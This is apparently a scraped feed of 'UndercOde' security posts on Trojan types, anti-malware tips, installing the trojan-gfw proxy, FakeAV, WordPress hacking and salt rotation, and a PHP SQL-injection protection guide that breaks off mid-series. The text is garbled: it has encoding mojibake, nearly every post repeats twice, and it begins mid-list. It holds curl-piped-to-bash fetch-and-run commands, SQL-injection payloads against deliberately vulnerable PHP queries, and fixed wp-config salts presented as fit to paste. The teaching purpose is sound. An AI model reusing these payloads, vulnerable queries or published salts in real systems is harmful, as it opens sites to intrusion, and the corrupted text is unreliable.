This type of Trojan infects your mobile device and can send and intercept text messages. Texts to premium-rate numbers can drive up your phone costs.
12) Trojan banker
This Trojan takes aim at your financial accounts. Itβs designed to steal your account information for all the things you do online. That includes banking, credit card, and bill pay data.
13) Trojan IM
This Trojan targets instant messaging. It steals your logins and passwords on IM platforms.
Examples of Trojan malware attacks
Trojan malware attacks can inflict a lot of damage. At the same time, Trojans continue to evolve. Here are three examples.
14) Emotet banking Trojan. After a long hiatus, Emotetβs activity increased in the last few months
15 )Rakhni Trojan More recently, it can deliver ransomware or a cryptojacker (allowing criminals to use your device to mine for cryptocurrency) to infected computers.
16) ZeuS/Zbot.This banking Trojan is another oldie but baddie. ZeuS/Zbot source code was first released in 2011. It uses keystroke logging β recording your keystrokes as you log into your bank account, for instance β to steal your credentials and perhaps your account balance as well.
Posted by U N D E R C O D E
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Common types of Trojan malware:
t.me/UndercOdeTesting
π¦π »π ΄π π πππ °οΈππ:
1) Backdoor Trojan
This Trojan can create a βbackdoorβ on your computer. It lets an attacker access your computer and control it. Your data can be downloaded by a third party and stolen. Or more malware can be uploaded to your device.
2) Distributed Denial of Service (DDoS) attack Trojan
This Trojan performs DDoS attacks. The idea is to take down a network by flooding it with traffic. That traffic comes from your infected computer and others.
3) Downloader Trojan
This Trojan targets your already-infected computer. It downloads and installs new versions of malicious programs. These can include Trojans and adware.
4) Fake AV Trojan
This Trojan behaves like antivirus software, but demands money from you to detect and remove threats, whether theyβre real or fake.
5) Game-thief Trojan
The losers here may be online gamers. This Trojan seeks to steal their account information.
6) Infostealer Trojan
As it sounds, this Trojan is after data on your infected computer.
7) Mailfinder Trojan
This Trojan seeks to steal the email addresses youβve accumulated on your device.
8) Ransom Trojan
This Trojan seeks a ransom to undo damage it has done to your computer. This can include blocking your data or impairing your computerβs performance.
9) Remote Access Trojan
This Trojan can give an attacker full control over your computer via a remote network connection. Its uses include stealing your information or spying on you.
10) Rootkit Trojan
A rootkit aims to hide or obscure an object on your infected computer. To extend the time a malicious program runs on your device.
11) SMS Trojan
This type of Trojan infects your mobile device and can send and intercept text messages. Texts to premium-rate numbers can drive up your phone costs.
12) Trojan banker
This Trojan takes aim at your financial accounts. Itβs designed to steal your account information for all the things you do online. That includes banking, credit card, and bill pay data.
13) Trojan IM
This Trojan targets instant messaging. It steals your logins and passwords on IM platforms.
Examples of Trojan malware attacks
Trojan malware attacks can inflict a lot of damage. At the same time, Trojans continue to evolve. Here are three examples.
14) Emotet banking Trojan. After a long hiatus, Emotetβs activity increased in the last few months
15 )Rakhni Trojan More recently, it can deliver ransomware or a cryptojacker (allowing criminals to use your device to mine for cryptocurrency) to infected computers.
16) ZeuS/Zbot.This banking Trojan is another oldie but baddie. ZeuS/Zbot source code was first released in 2011. It uses keystroke logging β recording your keystrokes as you log into your bank account, for instance β to steal your credentials and perhaps your account balance as well.
Posted by U N D E R C O D E
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to help protect against Trojans
Here are some dos and donβts to help protect against Trojan malware. First, the dos:
fb.com/UndercOdeTestingCOMPANY
π¦π »π ΄π π πππ °οΈππ:
1) Computer security begins with installing and running an internet security suite. Run periodic diagnostic scans with your software. You can set it up so the program runs scans automatically during regular intervals.
2) Update your operating systemβs software as soon as updates are made available from the software company. Cybercriminals tend to exploit security holes in outdated software programs. In addition to operating system updates, you should also check for updates on other software that you use on your computer.
3) Protect your accounts with complex, unique passwords. Create a unique password for each account using a complex combination of letters, numbers, and symbols.
4) Keep your personal information safe with firewalls.
5 ) Back up your files regularly. If a Trojan infects your computer, this will help you to restore your data.
6) Be careful with email attachments. To help stay safe, scan an email attachment first.
7) A lot of things you should do come with a corresponding thing not to do β like, do be careful with email attachments and donβt click on suspicious email attachments. Here are some more donβts.
8) Donβt visit unsafe websites. Some internet security software will alert you that youβre about to visit an unsafe site, such as Norton Safe Web.
9) Donβt open a link in an email unless youβre confident it comes from a legitimate source. In general, avoid opening unsolicited emails from senders you donβt know.
10) Donβt download or install programs if you donβt have complete trust in the publisher.
11) Donβt click on pop-up windows that promise free programs that perform useful tasks.
12) Donβt ever open a link in an email unless you know exactly what it is.
E N J O Y
Posted by U N D E R C O D E
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to help protect against Trojans
Here are some dos and donβts to help protect against Trojan malware. First, the dos:
fb.com/UndercOdeTestingCOMPANY
π¦π »π ΄π π πππ °οΈππ:
1) Computer security begins with installing and running an internet security suite. Run periodic diagnostic scans with your software. You can set it up so the program runs scans automatically during regular intervals.
2) Update your operating systemβs software as soon as updates are made available from the software company. Cybercriminals tend to exploit security holes in outdated software programs. In addition to operating system updates, you should also check for updates on other software that you use on your computer.
3) Protect your accounts with complex, unique passwords. Create a unique password for each account using a complex combination of letters, numbers, and symbols.
4) Keep your personal information safe with firewalls.
5 ) Back up your files regularly. If a Trojan infects your computer, this will help you to restore your data.
6) Be careful with email attachments. To help stay safe, scan an email attachment first.
7) A lot of things you should do come with a corresponding thing not to do β like, do be careful with email attachments and donβt click on suspicious email attachments. Here are some more donβts.
8) Donβt visit unsafe websites. Some internet security software will alert you that youβre about to visit an unsafe site, such as Norton Safe Web.
9) Donβt open a link in an email unless youβre confident it comes from a legitimate source. In general, avoid opening unsolicited emails from senders you donβt know.
10) Donβt download or install programs if you donβt have complete trust in the publisher.
11) Donβt click on pop-up windows that promise free programs that perform useful tasks.
12) Donβt ever open a link in an email unless you know exactly what it is.
E N J O Y
Posted by U N D E R C O D E
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
UndercOde Testing Company
UndercOde Testing Company. 94 likes Β· 6 talking about this. Local service
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦An unidentifiable mechanism that helps you bypass GFW
Twitter.com/UndercOdeTC
π¦πβπππΈπππππΈπππβ & βπβ:
π¦ sudo bash -c "$(curl -fsSL https://raw.githubusercontent.com/trojan-gfw/trojan-quickstart/master/trojan-quickstart.sh)"
Or > sudo bash -c "$(wget -O- https://raw.githubusercontent.com/trojan-gfw/trojan-quickstart/master/trojan-quickstart.sh)"
π¦ AOSC OS
> sudo apt-get install trojan
3) Arch Linux
> sudo pacman -S trojan
π¦ AUR
$(AURHelper) -S trojan-git
π¦ Debian
> sudo apt install trojan
> TROJAN_DEBIAN_VERSION="1.10.0-3"
> sudo apt update
> sudo apt install build-essential devscripts debhelper cmake libboost->
> system-dev libboost-program-options-dev libssl-dev default-libmysqlclient-dev python3 curl openssl
> dget http://ftp.us.debian.org/debian/pool/main/t/trojan/trojan_${TROJAN_DEBIAN_VERSION}.dsc
>dpkg-source -x trojan_${TROJAN_DEBIAN_VERSION}.dsc trojan-${TROJAN_DEBIAN_VERSION}
>cd trojan-${TROJAN_DEBIAN_VERSION}/
>dpkg-buildpackage -us -uc -d
>sudo dpkg -i ../trojan_${TROJAN_DEBIAN_VERSION}_$(dpkg-architecture -q DEB_BUILD_ARCH).deb
>sudo apt purge devscripts debhelper cmake # you can remove it now
π¦Gentoo
> sudo emerge --sync
> sudo emerge -av trojan
π¦ Ubuntu
Not for Debian
> sudo add-apt-repository ppa:greaterfire/trojan
> sudo apt-get update
> sudo apt-get install trojan
> sudo apt-get install trojan
π¦Pre-compiled binary
https://github.com/trojan-gfw/trojan/releases/latest
π¦ Chrome OS
There are two ways:
1) Use crouton to install a linux chroot environment, and install trojan just like in a normal linux.
2) Enable Google's Linux (beta) in the settings, and run the following commands in the terminal:
> sudo -i
> apt update
> apt -y install git g++ cmake libboost-system-dev libboost-program-options-dev libssl-dev default-libmysqlclient-dev
> git clone https://github.com/trojan-gfw/trojan.git
>cd trojan/
>cmake -DCMAKE_INSTALL_PREFIX:PATH=/usr -DSYSTEMD_SERVICE=ON .
>make install
or you can upgrade it to Debian Buster:
>sudo -i
>apt update && apt dist-upgrade
>cp /etc/apt/sources.list /etc/apt/sources.list.bak
>sed -i 's/stretch/buster/g' /etc/apt/sources.list
>apt update && apt dist-upgrade
apt install trojan
Note: The IP address of the SOCKS5 proxy is not 127.0.0.1, check it by running ifconfig or ip addr.
π¦ Windows (>=Vista)
https://github.com/trojan-gfw/trojan/releases/latest
> Download and install vc_redist.x64.exe before running the Windows binary.
π¦macOS
> Install homebrew and run commands
> brew tap trojan-gfw/homebrew-trojan
brew install trojan
Posted by U N D E R C O D E
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦An unidentifiable mechanism that helps you bypass GFW
Twitter.com/UndercOdeTC
π¦πβπππΈπππππΈπππβ & βπβ:
π¦ sudo bash -c "$(curl -fsSL https://raw.githubusercontent.com/trojan-gfw/trojan-quickstart/master/trojan-quickstart.sh)"
Or > sudo bash -c "$(wget -O- https://raw.githubusercontent.com/trojan-gfw/trojan-quickstart/master/trojan-quickstart.sh)"
π¦ AOSC OS
> sudo apt-get install trojan
3) Arch Linux
> sudo pacman -S trojan
π¦ AUR
$(AURHelper) -S trojan-git
π¦ Debian
> sudo apt install trojan
> TROJAN_DEBIAN_VERSION="1.10.0-3"
> sudo apt update
> sudo apt install build-essential devscripts debhelper cmake libboost->
> system-dev libboost-program-options-dev libssl-dev default-libmysqlclient-dev python3 curl openssl
> dget http://ftp.us.debian.org/debian/pool/main/t/trojan/trojan_${TROJAN_DEBIAN_VERSION}.dsc
>dpkg-source -x trojan_${TROJAN_DEBIAN_VERSION}.dsc trojan-${TROJAN_DEBIAN_VERSION}
>cd trojan-${TROJAN_DEBIAN_VERSION}/
>dpkg-buildpackage -us -uc -d
>sudo dpkg -i ../trojan_${TROJAN_DEBIAN_VERSION}_$(dpkg-architecture -q DEB_BUILD_ARCH).deb
>sudo apt purge devscripts debhelper cmake # you can remove it now
π¦Gentoo
> sudo emerge --sync
> sudo emerge -av trojan
π¦ Ubuntu
Not for Debian
> sudo add-apt-repository ppa:greaterfire/trojan
> sudo apt-get update
> sudo apt-get install trojan
> sudo apt-get install trojan
π¦Pre-compiled binary
https://github.com/trojan-gfw/trojan/releases/latest
π¦ Chrome OS
There are two ways:
1) Use crouton to install a linux chroot environment, and install trojan just like in a normal linux.
2) Enable Google's Linux (beta) in the settings, and run the following commands in the terminal:
> sudo -i
> apt update
> apt -y install git g++ cmake libboost-system-dev libboost-program-options-dev libssl-dev default-libmysqlclient-dev
> git clone https://github.com/trojan-gfw/trojan.git
>cd trojan/
>cmake -DCMAKE_INSTALL_PREFIX:PATH=/usr -DSYSTEMD_SERVICE=ON .
>make install
or you can upgrade it to Debian Buster:
>sudo -i
>apt update && apt dist-upgrade
>cp /etc/apt/sources.list /etc/apt/sources.list.bak
>sed -i 's/stretch/buster/g' /etc/apt/sources.list
>apt update && apt dist-upgrade
apt install trojan
Note: The IP address of the SOCKS5 proxy is not 127.0.0.1, check it by running ifconfig or ip addr.
π¦ Windows (>=Vista)
https://github.com/trojan-gfw/trojan/releases/latest
> Download and install vc_redist.x64.exe before running the Windows binary.
π¦macOS
> Install homebrew and run commands
> brew tap trojan-gfw/homebrew-trojan
brew install trojan
Posted by U N D E R C O D E
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦WHAT IS FAKEAV TORGAN AND WHAT HE DO ?
t.me/UndercOdeTesting
π¦π »π ΄π π πππ °οΈππ:
1) Trojan.FakeAV is a detection for Trojan horse programs that intentionally misrepresent the security status of a computer.
2) These programs attempt to convince the user to purchase software in order to remove non-existent malware or security risks from the computer.
3) The user is continually prompted to pay for the software using a credit card. Some programs employ tactics designed to annoy or disrupt the activities of the user until the software is purchased.
4) Clones
Trojan.FakeAV detects one of the most prolific types of risks seen on the Internet today. Everyday many bogus antivirus and security applications are released and pushed to unsuspecting users through various delivery channels.
5) Many of these programs turn out to be clones of each other. They are often created from the same code base but presented with a different name and look - achieved through the use of a "skin".
6) Infection
Users may encounter this kind of threat when they visit Web sites that attempt to convince them to remove non-existent malware or security risks from their computers by installing the bogus software.
7) The Trojan can also be installed by other malware, drive-by downloads, and when downloading and installing other software.
8) Users may be directed to these sites by way of the following methods:
Spam emails that contain links or attachments
9) Blogs and forums that are spammed with links to adult videos
10) User-generated content spam (e.g. fake videos)
11) Malicious banner advertisements
12) Pirated software (βwarezβ) and pornography sites
13) Search Engine Optimization (SEO) poisoning
14) Fake torrent files or files on file sharing networks
15) Web pages containing exploits
16) The programs may also be downloaded on to the computer by other threats such as:
Backdoor.Tidserv
Trojan.Vundo
W32.Waledac
W32.Virut
π¦Functionality
1) These programs intentionally misrepresent the security status of a computer by continually presenting fake scan dialog boxes and alert messages that prompt the user to buy the product.
2) The programs often have an icon in the notification area of the operating system desktop and constantly display pop-up messages alerting the user about fake security issues such as virus infections.
3) These pop-up windows only disappear once the user has purchased the product and the non-existent threats have supposedly been removed from the compromised computer.
Posted by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦WHAT IS FAKEAV TORGAN AND WHAT HE DO ?
t.me/UndercOdeTesting
π¦π »π ΄π π πππ °οΈππ:
1) Trojan.FakeAV is a detection for Trojan horse programs that intentionally misrepresent the security status of a computer.
2) These programs attempt to convince the user to purchase software in order to remove non-existent malware or security risks from the computer.
3) The user is continually prompted to pay for the software using a credit card. Some programs employ tactics designed to annoy or disrupt the activities of the user until the software is purchased.
4) Clones
Trojan.FakeAV detects one of the most prolific types of risks seen on the Internet today. Everyday many bogus antivirus and security applications are released and pushed to unsuspecting users through various delivery channels.
5) Many of these programs turn out to be clones of each other. They are often created from the same code base but presented with a different name and look - achieved through the use of a "skin".
6) Infection
Users may encounter this kind of threat when they visit Web sites that attempt to convince them to remove non-existent malware or security risks from their computers by installing the bogus software.
7) The Trojan can also be installed by other malware, drive-by downloads, and when downloading and installing other software.
8) Users may be directed to these sites by way of the following methods:
Spam emails that contain links or attachments
9) Blogs and forums that are spammed with links to adult videos
10) User-generated content spam (e.g. fake videos)
11) Malicious banner advertisements
12) Pirated software (βwarezβ) and pornography sites
13) Search Engine Optimization (SEO) poisoning
14) Fake torrent files or files on file sharing networks
15) Web pages containing exploits
16) The programs may also be downloaded on to the computer by other threats such as:
Backdoor.Tidserv
Trojan.Vundo
W32.Waledac
W32.Virut
π¦Functionality
1) These programs intentionally misrepresent the security status of a computer by continually presenting fake scan dialog boxes and alert messages that prompt the user to buy the product.
2) The programs often have an icon in the notification area of the operating system desktop and constantly display pop-up messages alerting the user about fake security issues such as virus infections.
3) These pop-up windows only disappear once the user has purchased the product and the non-existent threats have supposedly been removed from the compromised computer.
Posted by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How hackers hack sites
main ways hackers crack sites:
t.me/UndercodeTesting
1) Weak passwords
2) Deprecated Software
3) Insecure themes and plugins
4) Hosting Software Vulnerabilities
> There are many other methods, but these methods are the most common.
π¦π »π ΄π π πππ °οΈππ:
1) Login and password selection
By default, WordPress has no limit on the number of attempts to enter a username and password. If you leave it as it is, a hacker may try to pick the right combination an unlimited number of times. This is called a brute force attack, brute force attack or password brute force attack.
2) You can limit the number of authorization attempts using a plugin, for example Login LockDown . Another way is to transfer the authorization page to a new address, for example ΡΠ°ΠΉΡ.ru/login.
3) Vulnerability descriptions of legacy WordPress versions, plugins, and themes are available on the Internet. Bots have these descriptions. When they find a site with an outdated version of the software, they hack this site using an existing algorithm.
4) To protect the site from such attacks, always use only the latest software version.
5) The hacker saves a file with a special script on the server, which allows him to access the site at any time, while the hacker does not use the standard login page, but logs into the site through the backdoor he created.
6) To disguise the created file, hackers call it so that it looks like part of the WordPress core, for example, users-wp.php , php5.php , sunrise.php or something like that.
7) If you do not have any plugin installed that warns about file changes, it can be quite difficult to determine if a malicious file has been added.
8) There are several signs that may indicate that the site has been hacked. If you open the frontend or backend of a site, and you see a message in the browser that visiting this site may be unsafe, then your site may be hacked.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How hackers hack sites
main ways hackers crack sites:
t.me/UndercodeTesting
1) Weak passwords
2) Deprecated Software
3) Insecure themes and plugins
4) Hosting Software Vulnerabilities
> There are many other methods, but these methods are the most common.
π¦π »π ΄π π πππ °οΈππ:
1) Login and password selection
By default, WordPress has no limit on the number of attempts to enter a username and password. If you leave it as it is, a hacker may try to pick the right combination an unlimited number of times. This is called a brute force attack, brute force attack or password brute force attack.
2) You can limit the number of authorization attempts using a plugin, for example Login LockDown . Another way is to transfer the authorization page to a new address, for example ΡΠ°ΠΉΡ.ru/login.
3) Vulnerability descriptions of legacy WordPress versions, plugins, and themes are available on the Internet. Bots have these descriptions. When they find a site with an outdated version of the software, they hack this site using an existing algorithm.
4) To protect the site from such attacks, always use only the latest software version.
5) The hacker saves a file with a special script on the server, which allows him to access the site at any time, while the hacker does not use the standard login page, but logs into the site through the backdoor he created.
6) To disguise the created file, hackers call it so that it looks like part of the WordPress core, for example, users-wp.php , php5.php , sunrise.php or something like that.
7) If you do not have any plugin installed that warns about file changes, it can be quite difficult to determine if a malicious file has been added.
8) There are several signs that may indicate that the site has been hacked. If you open the frontend or backend of a site, and you see a message in the browser that visiting this site may be unsafe, then your site may be hacked.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Basic site security requirements
These requirements are a necessary minimum for site security.
fb.com/UndercOdeTestingCompany
π¦π »π ΄π π πππ °οΈππ:
1) Regularly update WordPress, scripts, plugins and themes.
2) Use complex logins and passwords.
3) Install the plugin to limit authorization attempts.
4) Choose plugins and themes from trusted authors.
5) Use reliable hosting.
6) Configure automatic backup of all files and database.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Basic site security requirements
These requirements are a necessary minimum for site security.
fb.com/UndercOdeTestingCompany
π¦π »π ΄π π πππ °οΈππ:
1) Regularly update WordPress, scripts, plugins and themes.
2) Use complex logins and passwords.
3) Install the plugin to limit authorization attempts.
4) Choose plugins and themes from trusted authors.
5) Use reliable hosting.
6) Configure automatic backup of all files and database.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Update software, change passwords, keys and salts :)
> Once you have removed the malicious code, update WordPress, plugins and themes. Change passwords on the site and on the hosting. Think about changing the password for the email and database (in the wp-config.php file and on the hosting).
t.me/UndercOdeTesting
1) Change the keys and salts , this will make all cookies that are stored in the browsers of users, including hackers, invalid for authorization on the site.
2) The key and salt generator is on the WordPress website. Copy the new keys and paste them into the wp-config file at this location:
> define('AUTH_KEY', 'r?=mgu>fln25:B(vkI2l4mK_3v5>K*$<0)|nwPx#JJAK-3aMbu>@,m<69Z<(Bc--');
define('SECURE_AUTH_KEY', '0Z<j1rD>!|3x$sFedLT|?yiMw{Jx:&3Y%c^zoSn%WNicz@sh[wn;K8OMW_!:,L0C');
define('LOGGED_IN_KEY', '4{=AG|uXk#.h{,WXo3qOak^R-_f|uwJUn[>~^(GgZL3((iVx%=%_mC9iN|Vavz4b');
define('NONCE_KEY', 'BLj3h5)aK/fflv/EchqWqIAK!>T&{[cDE%Wz4^%teT_p`OLO3uMR(!!-vXDKO{3d');
define('AUTH_SALT', ']UxIOGK)4q%h3op98)Zv`x|b>!MNomc7(>v+Za&RkQeKy$f/->u3b3nC*v`2/3P^');
define('SECURE_AUTH_SALT', 'KGxLW%Kj|:dY/~W_wdR<CFHMi!Ce^MZX2)+Pnk:!Ulc[/}|}^k}b&s4kH->_|nF ');
define('LOGGED_IN_SALT', 'I-YI,LF. GOv4UU!6%P./.D#M79%M])WqNL^hHE[N>U$bfMUtuDO=)q]N588HB,4');
define('NONCE_SALT', 'wAlP+rI2uHJ5wx|ucHeoha.%P_T4Xnc(Lp43|<dnQ72Jsv7#{cF_ptT8-~)G)+@,');
3) Before modifying the wp-config file, make a backup of it. Save the file, upload it back to the server.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Update software, change passwords, keys and salts :)
> Once you have removed the malicious code, update WordPress, plugins and themes. Change passwords on the site and on the hosting. Think about changing the password for the email and database (in the wp-config.php file and on the hosting).
t.me/UndercOdeTesting
1) Change the keys and salts , this will make all cookies that are stored in the browsers of users, including hackers, invalid for authorization on the site.
2) The key and salt generator is on the WordPress website. Copy the new keys and paste them into the wp-config file at this location:
> define('AUTH_KEY', 'r?=mgu>fln25:B(vkI2l4mK_3v5>K*$<0)|nwPx#JJAK-3aMbu>@,m<69Z<(Bc--');
define('SECURE_AUTH_KEY', '0Z<j1rD>!|3x$sFedLT|?yiMw{Jx:&3Y%c^zoSn%WNicz@sh[wn;K8OMW_!:,L0C');
define('LOGGED_IN_KEY', '4{=AG|uXk#.h{,WXo3qOak^R-_f|uwJUn[>~^(GgZL3((iVx%=%_mC9iN|Vavz4b');
define('NONCE_KEY', 'BLj3h5)aK/fflv/EchqWqIAK!>T&{[cDE%Wz4^%teT_p`OLO3uMR(!!-vXDKO{3d');
define('AUTH_SALT', ']UxIOGK)4q%h3op98)Zv`x|b>!MNomc7(>v+Za&RkQeKy$f/->u3b3nC*v`2/3P^');
define('SECURE_AUTH_SALT', 'KGxLW%Kj|:dY/~W_wdR<CFHMi!Ce^MZX2)+Pnk:!Ulc[/}|}^k}b&s4kH->_|nF ');
define('LOGGED_IN_SALT', 'I-YI,LF. GOv4UU!6%P./.D#M79%M])WqNL^hHE[N>U$bfMUtuDO=)q]N588HB,4');
define('NONCE_SALT', 'wAlP+rI2uHJ5wx|ucHeoha.%P_T4Xnc(Lp43|<dnQ72Jsv7#{cF_ptT8-~)G)+@,');
3) Before modifying the wp-config file, make a backup of it. Save the file, upload it back to the server.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Tips to help you prevent your phone from being hacked guide:
t.me/UndercOdeTesting
π¦π »π ΄π π πππ °οΈππ:
Here are some tips you can use to prevent your phone from being hacked:
1) Do not share passwords with everyone.
2) Do not use the same passwords for all devices and accounts.
3) Do not open links sent in text messages and emails without checking the source.
4) Install antivirus software on your phone.
5) Check the applications installed on your phone and remove those that you consider suspicious.
6) Make sure you have 2fa for iCloud and online accounts.
7) Regularly update the applications and OS of your phone.
8) Do not connect your phone to a public Wi-Fi account without using a VPN.
9) Use a VPN to connect your phone to a public Wi-Fi network.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Tips to help you prevent your phone from being hacked guide:
t.me/UndercOdeTesting
π¦π »π ΄π π πππ °οΈππ:
Here are some tips you can use to prevent your phone from being hacked:
1) Do not share passwords with everyone.
2) Do not use the same passwords for all devices and accounts.
3) Do not open links sent in text messages and emails without checking the source.
4) Install antivirus software on your phone.
5) Check the applications installed on your phone and remove those that you consider suspicious.
6) Make sure you have 2fa for iCloud and online accounts.
7) Regularly update the applications and OS of your phone.
8) Do not connect your phone to a public Wi-Fi account without using a VPN.
9) Use a VPN to connect your phone to a public Wi-Fi network.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦IN PHP SQL Injection Protection GUIDE BY UndercOde
t.me/iOsDeveloppers
π¦PART 1 :
> SQL injection attack principle
1) Let's say our site has a page showing weather history for one city. The identifier of this city is transmitted in the link in the request parameter:, /weather.php?city_id=<ID>where IDis the primary key of the city.
In a PHP script, we use this parameter to substitute a SQL query:
$city_id = $_GET['city_id'];
$res = mysqli_query($link, "SELECT * FROM weather_log WHERE city_id = " . $city_id);
2) If the city_id parameter equal to 10 ( /weather.php?city_id=10) is passed on the server , then an SQL query will be executed:
SELECT * FROM weather_log WHERE city_id = 10
But if the attacker passes a string as the id parameter -1 OR 1=1, the request will be executed:
SELECT * FROM weather_log WHERE city_id = -1 OR 1=1
3) Adding SQL language constructs (instead of simple values) to the input parameters changes the logic of the entire SQL query!
this example, instead of showing data for one city, data will be obtained for all cities, because the expression 1 = 1 is always true. Instead of an expression, there SELECT ...could be an expression to update the data, and then the consequences would be even more serious.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦IN PHP SQL Injection Protection GUIDE BY UndercOde
t.me/iOsDeveloppers
π¦PART 1 :
> SQL injection attack principle
1) Let's say our site has a page showing weather history for one city. The identifier of this city is transmitted in the link in the request parameter:, /weather.php?city_id=<ID>where IDis the primary key of the city.
In a PHP script, we use this parameter to substitute a SQL query:
$city_id = $_GET['city_id'];
$res = mysqli_query($link, "SELECT * FROM weather_log WHERE city_id = " . $city_id);
2) If the city_id parameter equal to 10 ( /weather.php?city_id=10) is passed on the server , then an SQL query will be executed:
SELECT * FROM weather_log WHERE city_id = 10
But if the attacker passes a string as the id parameter -1 OR 1=1, the request will be executed:
SELECT * FROM weather_log WHERE city_id = -1 OR 1=1
3) Adding SQL language constructs (instead of simple values) to the input parameters changes the logic of the entire SQL query!
this example, instead of showing data for one city, data will be obtained for all cities, because the expression 1 = 1 is always true. Instead of an expression, there SELECT ...could be an expression to update the data, and then the consequences would be even more serious.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Telegram
iUNDERCODE IOS JAILBREAK SUPPORT & HELP
WELCOME TO iUNDERCODE BY UNDERCODE TESTING FOR IOS JAILBREAK & TWEAKS GROUP RULES @UNDERCODERULES
ππΎππππ±π ΄
Youtube.com/c/Undercode
π ΅π°π ²π ΄π±πΎπΎπ Ί
@UndercOdeTesting
@iUNDERCODE
π Έπ ½πππ°π Άππ°π Ό
@UndercOdeTestinG
@iUNDERCODE
πππ Έπππ ΄π
@iUNDERCODE
@UNDERCODENEWS
ππΎππππ±π ΄
Youtube.com/c/Undercode
π ΅π°π ²π ΄π±πΎπΎπ Ί
@UndercOdeTesting
@iUNDERCODE
π Έπ ½πππ°π Άππ°π Ό
@UndercOdeTestinG
@iUNDERCODE
πππ Έπππ ΄π
@iUNDERCODE
@UNDERCODENEWS
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How Protect YouR Php site from sql attack :
t.me/UndercOdeTesting
PART 2 :
> Casting to integer type
1) In SQL queries, integer values ββreceived from the user are often substituted. In the examples above, the city identifier obtained from the request parameters was used.
2) This identifier can be forced to a number. So we exclude the appearance of dangerous expressions in it. If the hacker passes code in this parameter instead of the number SQL, then the result of the cast will be zero, and the logic of the entire SQL query will not change.
3) PHP can assign a new type to a variable. This code will force the variable to be an integer type:
$city_id = $_GET['city_id'];
settype($city_id, 'integer');
After conversion, the variable $city_idcan be safely used in SQL queries.
4) Escaping Values
What should I do if I need to substitute a string value in an SQL query? For example, the site has the ability to search for a city by its name. The search form will pass the search query to the GET parameter, and we use it in the SQL query:
$city_name = $_GET['search'];
$sql = "SELECT * FROM cities WHERE name LIKE('%$city_name%')";
5) But if there city_nameis a quotation mark in the parameter , then the meaning of the request can be radically changed. Passing the value to search_text ')+and+(id<>'0, we will execute a request that displays a list of all cities:
SELECT * FROM cities WHERE name LIKE('%') AND (id<>'0%'))
The meaning of the query has changed because the quotation mark from the query parameter is considered a control character: MySQL determines the end of the value by the quotation mark after it, therefore, the quotation mark values ββthemselves should not contain.
Obviously, casting to a numeric type is not suitable for string values. Therefore, to protect the string value, use the escaping operation .
6) Escaping adds an apostrophe in the line before quotation marks (and other special characters) \.
Such processing removes the quotation marks of their status - they no longer determine the end of the value and cannot affect the logic of the SQL expression.
7) The function is responsible for escaping values mysqli_real_escape_string().
This code will process the value from the parameter, making it safe for use in the request:
$city_name = mysqli_real_escape_string($link, $_GET['search']);
$sql = "SELECT * FROM cities WHERE name LIKE('%$city_name%')";
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How Protect YouR Php site from sql attack :
t.me/UndercOdeTesting
PART 2 :
> Casting to integer type
1) In SQL queries, integer values ββreceived from the user are often substituted. In the examples above, the city identifier obtained from the request parameters was used.
2) This identifier can be forced to a number. So we exclude the appearance of dangerous expressions in it. If the hacker passes code in this parameter instead of the number SQL, then the result of the cast will be zero, and the logic of the entire SQL query will not change.
3) PHP can assign a new type to a variable. This code will force the variable to be an integer type:
$city_id = $_GET['city_id'];
settype($city_id, 'integer');
After conversion, the variable $city_idcan be safely used in SQL queries.
4) Escaping Values
What should I do if I need to substitute a string value in an SQL query? For example, the site has the ability to search for a city by its name. The search form will pass the search query to the GET parameter, and we use it in the SQL query:
$city_name = $_GET['search'];
$sql = "SELECT * FROM cities WHERE name LIKE('%$city_name%')";
5) But if there city_nameis a quotation mark in the parameter , then the meaning of the request can be radically changed. Passing the value to search_text ')+and+(id<>'0, we will execute a request that displays a list of all cities:
SELECT * FROM cities WHERE name LIKE('%') AND (id<>'0%'))
The meaning of the query has changed because the quotation mark from the query parameter is considered a control character: MySQL determines the end of the value by the quotation mark after it, therefore, the quotation mark values ββthemselves should not contain.
Obviously, casting to a numeric type is not suitable for string values. Therefore, to protect the string value, use the escaping operation .
6) Escaping adds an apostrophe in the line before quotation marks (and other special characters) \.
Such processing removes the quotation marks of their status - they no longer determine the end of the value and cannot affect the logic of the SQL expression.
7) The function is responsible for escaping values mysqli_real_escape_string().
This code will process the value from the parameter, making it safe for use in the request:
$city_name = mysqli_real_escape_string($link, $_GET['search']);
$sql = "SELECT * FROM cities WHERE name LIKE('%$city_name%')";
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How Protect YouR Php site from sql attack :
fb.com/UndercOdeTestingCompany
PART 3-end :
> Prepared Expressions
